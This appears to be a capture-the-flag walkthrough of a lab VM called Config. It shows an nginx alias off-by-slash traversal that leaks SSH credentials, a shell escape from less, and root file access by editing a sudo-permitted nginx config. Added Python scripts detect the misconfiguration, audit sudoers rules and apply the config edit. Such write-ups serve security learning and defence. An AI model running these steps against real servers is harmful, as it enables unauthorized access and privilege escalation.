Config [box from a group member][walkthrough]

Information gathering

┌──(root㉿kali)-[~]
└─# arp-scan -l | grep PCS
192.168.1.17 08:00:27:c2:13:f5 PCS Systemtechnik GmbH

┌──(root㉿kali)-[~]
└─# IP=192.168.1.17
┌──(root㉿kali)-[~]
└─# nmap -sV -sC -A $IP -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-08 14:04 CST
Nmap scan report for 192.168.1.17
Host is up (0.00025s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: ConfigMaster - \xE6\x99\xBA\xE8\x83\xBD\xE8\xBF\x90\xE7\xBB\xB4\xE9\x85\x8D\xE7\xBD\xAE\xE7\xAE\xA1\xE7\x90\x86\xE5\xB9\xB3\xE5\x8F\xB0
MAC Address: 08:00:27:C2:13:F5 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms 192.168.1.17

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds

Directory scanning

┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.17
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,php3,bak,gz,shtml,txt,html,bk,zip,tar
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 21720]
/config (Status: 301) [Size: 169] [--> http://192.168.1.17/config/]
Progress: 2426160 / 2426171 (100.00%)
===============================================================
Finished
===============================================================

The scan turns up a /config directory, so scan /config next.

┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP/config -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.17/config
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,bk,bak,zip,tar,shtml,php3,txt,gz
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 21720]
Progress: 2426160 / 2426171 (100.00%)
===============================================================
Finished
===============================================================

Both paths serve an index.html of exactly 21720 bytes. Download the two and diff them:

┌──(root㉿kali)-[~]
└─# curl http://$IP/index.html > index.html
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 21720 100 21720 0 0 20.1M 0 --:--:-- --:--:-- --:--:-- 20.7M

┌──(root㉿kali)-[~]
└─# curl http://$IP/config/index.html > config_index.html
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 21720 100 21720 0 0 15.4M 0 --:--:-- --:--:-- --:--:-- 20.7M

┌──(root㉿kali)-[~]
└─# diff index.html config_index.html

No difference: /config/ serves the same directory as the web root.

Going by the article Vulhub-POC/Nginx 配置错误漏洞.md at master · lg996/Vulhub-POC, this looks like the nginx alias misconfiguration (off-by-slash) path traversal: if a `location /config` block is written without a trailing slash while its `alias` target ends with one, a request for `/config../` is rewritten to `<alias>../`, i.e. the directory one level above the aliased one. An identical index.html under / and /config/ fits that picture, so probe for it.

┌──(root㉿kali)-[~]
└─# curl http://$IP/config../
<html>
<head><title>403 Forbidden</title></head>
<body>
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.18.0</center>
</body>
</html>

A 403 rather than a 404: nginx resolved `/config../` to a real directory but refuses to list it (no index file, autoindex off), which confirms the traversal. Now brute-force that parent directory.
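As an added example (not part of the original write-up or of the box), the following Python script shows both halves of the issue: a small checker that scans an nginx configuration for `location` prefixes without a trailing slash paired with an `alias` that has one, and a resolver that reproduces how such a pair maps `/config../config.txt` onto the filesystem. The two server blocks and the alias target `/var/www/html/` are constructed assumptions; the box's real nginx.conf was never read, although the `/config../html/` directory found by the next scan is consistent with an alias of that shape.

```python
"""Nginx alias off-by-slash: config checker and path resolver.

Added example for this write-up, not code from the box or from nginx.
The sample configs below are constructed; the alias target
/var/www/html/ is an assumption, not something read from the target.
"""
import posixpath
import re

# Constructed: the classic misconfiguration. The location prefix has no
# trailing slash, the alias does, so "/config../x" becomes "/var/www/html/../x".
VULNERABLE_CONF = """
server {
    listen 80;
    root /var/www/html;
    location /config {
        alias /var/www/html/;
    }
}
"""

# Constructed: the same block written consistently. "/config../" no longer
# matches the prefix "/config/", so it falls through to the root directive.
FIXED_CONF = """
server {
    listen 80;
    root /var/www/html;
    location /config/ {
        alias /var/www/html/;
    }
}
"""

_LOCATION_RE = re.compile(r"location\s+(?:(=|~\*?|\^~)\s+)?(\S+)\s*\{")
_ALIAS_RE = re.compile(r"alias\s+([^;\s]+)\s*;")


def find_offbyslash(conf: str) -> list[tuple[str, str]]:
    """Return (location, alias) pairs where the prefix lacks a trailing
    slash but the alias has one. Only plain prefix locations count:
    '=' needs an exact URI match and '~' / '~*' are regexes, so the
    'prefix..' trick does not apply to them."""
    findings = []
    current = None  # prefix of the location block we are inside, if any
    for raw in conf.splitlines():
        line = raw.strip()
        m = _LOCATION_RE.match(line)
        if m:
            modifier, prefix = m.group(1), m.group(2)
            current = None if modifier in ("=", "~", "~*") else prefix
            continue
        m = _ALIAS_RE.match(line)
        if m and current is not None:
            alias = m.group(1)
            if not current.endswith("/") and alias.endswith("/"):
                findings.append((current, alias))
            continue
        if line == "}":
            current = None
    return findings


def resolve(uri: str, location: str, alias: str) -> str:
    """Map a request URI to the path nginx opens for an alias location:
    the matched prefix is replaced by the alias, the rest of the URI is
    appended, and the kernel collapses any '..' segments. nginx
    normalises '/config/../' away before matching, but 'config..' is a
    single path segment and survives, which is what makes this work."""
    if not uri.startswith(location):
        raise ValueError(f"{uri!r} does not match location prefix {location!r}")
    return posixpath.normpath(alias + uri[len(location):])


if __name__ == "__main__":
    for name, conf in (("vulnerable", VULNERABLE_CONF), ("fixed", FIXED_CONF)):
        print(f"{name}: {find_offbyslash(conf)}")
    loc, alias = find_offbyslash(VULNERABLE_CONF)[0]
    for uri in ("/config/index.html", "/config../", "/config../config.txt"):
        print(f"{uri} -> {resolve(uri, loc, alias)}")
```

With these assumptions `/config../` resolves to `/var/www`, a directory with no index file, which is exactly the 403 seen above. The fix is the one in FIXED_CONF (or replacing `alias` with `root` where URI and directory names line up); `find_offbyslash` can be run over the output of `nginx -T` on a live host.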

┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP/config../ -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.17/config../
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php3,txt,html,bk,bak,shtml,zip,tar,gz,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/html (Status: 301) [Size: 169] [--> http://192.168.1.17/config../html/]
/config.txt (Status: 200) [Size: 41]
Progress: 2426160 / 2426171 (100.00%)
===============================================================
Finished
===============================================================

┌──(root㉿kali)-[~]
└─# curl http://$IP/config../config.txt
SSH Credentials: mikannse/mikannsebyebye

That gives us the SSH credentials. Logging in over SSH with them drops us into a pager showing the banner:

==================================
| !!! WARNING !!! |
| Unauthorized access prohibited|
| This system is monitored |
==================================
/home/mikannse/banner.txt (END)

The `(END)` prompt and the path `/home/mikannse/banner.txt` show the banner is being displayed through `less`, which allows shell escapes with `!`: type `!bash` at the prompt to get a shell.

mikannse@Config:~$ ls -a
. .. banner.txt .bash_history .bash_logout .bashrc .lesshst mikannse.conf .profile user.txt
mikannse@Config:~$ cat user.txt
flag{user-530773d6-5951-11f0-89d9-836ccaf94d6b}

Privilege escalation

List the commands the current user is allowed to run via sudo:

mikannse@Config:~$ sudo -l
Matching Defaults entries for mikannse on Config:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mikannse may run the following commands on Config:
(root) NOPASSWD: /usr/sbin/nginx -c /home/mikannse/mikannse.conf

The user may run `/usr/sbin/nginx -c /home/mikannse/mikannse.conf` as root without a password. The config file lives in our own home directory, so we control every directive nginx will honour while running as root: which user the worker processes run as, which directory they serve, and which files they write (logs, pid file).

mikannse@Config:~$ cat mikannse.conf
user mikannse;
worker_processes auto;
pid /run/nginx.pid;

events {
    worker_connections 1024;
}

http {
    default_type application/octet-stream;
    sendfile on;
    keepalive_timeout 65;

    server {
        listen 8080;
        server_name Config;
        root /tmp;

        location / {
            autoindex on;
            try_files $uri $uri/ =404;
        }

        access_log /var/log/nginx/mikannse_access.log;
        error_log /var/log/nginx/mikannse_error.log;
    }
}

Edit the config: change `user mikannse;` to `user root;` and `root /tmp;` to `root /;`. Under sudo the nginx master already runs as root, but the workers drop to the uid named by the `user` directive, and it is the workers that open and serve files; making that root lets them read /root. With the document root at / and `autoindex on`, the whole filesystem becomes browsable on port 8080.

Run `sudo /usr/sbin/nginx -c /home/mikannse/mikannse.conf`, then visit http://192.168.1.17:8080/root to see the flag file. Note that a sudoers entry with arguments must be matched exactly, so `-t` (syntax check) cannot be added to the command; a typo in the config only shows up when the real command is run.
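As an added example (not code from the write-up or from the box), this Python script does two things. `weaponize()` applies the same two edits to a constructed copy of the config shown above, so the reasoning about `user` and `root` is explicit in code, and `audit_sudo_l()` runs the defender's check over constructed `sudo -l` output: flag any rule that starts a config-driven daemon with a config file under a user-writable path. The table of config flags and the list of writable prefixes are my assumptions.

```python
"""sudo + user-controlled nginx.conf: payload generation and sudoers audit.

Added example for this write-up, not code from the box. weaponize()
applies the two edits described above; audit_sudo_l(), the table of
config flags and the 'user-writable' prefixes are my own assumptions
about what a defender would want to check.
"""
import posixpath
import re
import shlex

# Constructed: the directives from /home/mikannse/mikannse.conf that matter.
ORIGINAL_CONF = """user mikannse;
worker_processes auto;
pid /run/nginx.pid;

events {
    worker_connections 1024;
}

http {
    server {
        listen 8080;
        root /tmp;

        location / {
            autoindex on;
            try_files $uri $uri/ =404;
        }
    }
}
"""

# Constructed: the relevant `sudo -l` output from the box.
SUDO_L_OUTPUT = r"""Matching Defaults entries for mikannse on Config:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mikannse may run the following commands on Config:
    (root) NOPASSWD: /usr/sbin/nginx -c /home/mikannse/mikannse.conf
"""


def weaponize(conf: str, serve_root: str = "/") -> str:
    """Run the workers as root and serve the whole filesystem.

    sudo starts the nginx master as root, but the workers that actually
    open files switch to the uid of the 'user' directive; changing it to
    root is what lets them read /root. 'root /' plus the existing
    'autoindex on' turns port 8080 into a browsable view of the disk."""
    conf = re.sub(r"^([ \t]*)user[ \t]+[^;]+;", r"\1user root;", conf, flags=re.M)
    conf = re.sub(r"^([ \t]*)root[ \t]+[^;]+;",
                  lambda m: f"{m.group(1)}root {serve_root};", conf, flags=re.M)
    return conf


# Daemons that take their main configuration from a command-line flag.
# Assumption: extend this table for the software present on the host.
CONFIG_FLAGS = {"nginx": "-c", "apache2": "-f", "httpd": "-f", "haproxy": "-f"}

# Assumption: directory prefixes an unprivileged user can normally write to.
USER_WRITABLE_PREFIXES = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

# Matches rule lines such as "(root) NOPASSWD: /usr/sbin/nginx -c /path".
_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def audit_sudo_l(output: str) -> list[dict]:
    """Flag `sudo -l` rules that run a config-driven daemon on a config
    file under a user-writable path: whoever can write that file decides
    what the daemon does with the target user's privileges."""
    findings = []
    for line in output.splitlines():
        m = _RULE_RE.match(line)
        if not m:
            continue
        argv = shlex.split(m.group("cmd"))
        if not argv:
            continue
        flag = CONFIG_FLAGS.get(posixpath.basename(argv[0]))
        if flag is None or flag not in argv[:-1]:
            continue
        config = argv[argv.index(flag) + 1]
        if config.startswith(USER_WRITABLE_PREFIXES):
            findings.append({
                "runas": m.group("runas").strip(),
                "command": argv[0],
                "config": config,
                "nopasswd": "NOPASSWD:" in m.group("tags"),
            })
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_l(SUDO_L_OUTPUT):
        print("writable config run with privilege:", finding)
    print(weaponize(ORIGINAL_CONF))
```

The defender's fix is to point the rule at a root-owned config outside the user's control, or to drop the rule; the audit also catches the `apache2 -f` and `haproxy -f` variants of the same mistake.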

┌──(root㉿kali)-[~]
└─# curl http://192.168.1.17:8080/root/root.txt
flag{root-bf116e68-5953-11f0-b06c-63e27ce93d04}